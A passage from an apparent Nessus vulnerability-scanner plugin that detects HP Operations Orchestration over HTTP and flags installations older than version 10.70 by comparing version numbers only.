exploits are available"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/03"); script_set_attribute(attribute:"patch_publication_date", value:"2017/01/03"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/12"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:operations_orchestration"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("hp_operations_orchestration_detect.nbin"); script_require_keys("installed_sw/HP Operations Orchestration"); script_require_ports("Services/www", 8080, 8443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); appname = "HP Operations Orchestration"; get_install_count(app_name:appname, exit_if_zero:TRUE); port = get_http_port(default:8080); install = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE); dir = install['path']; version = install['version']; edition = install['Edition']; install_url = build_url(port:port, qs:dir); if ("Community" >!< edition && "Enterprise" >!< edition) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname + ' ' + edition, install_url); fix = "10.70"; if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0) { items = make_array("URL", install_url, "Installed version", version, "Fixed version", fix); order = make_list("URL", "Installed version", "Fixed version"); report = report_items_str(report_items:items, ordered_fields:order); security_report_v4(port:port, extra:report, severity:SECURITY_HOLE); exit(0); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, version);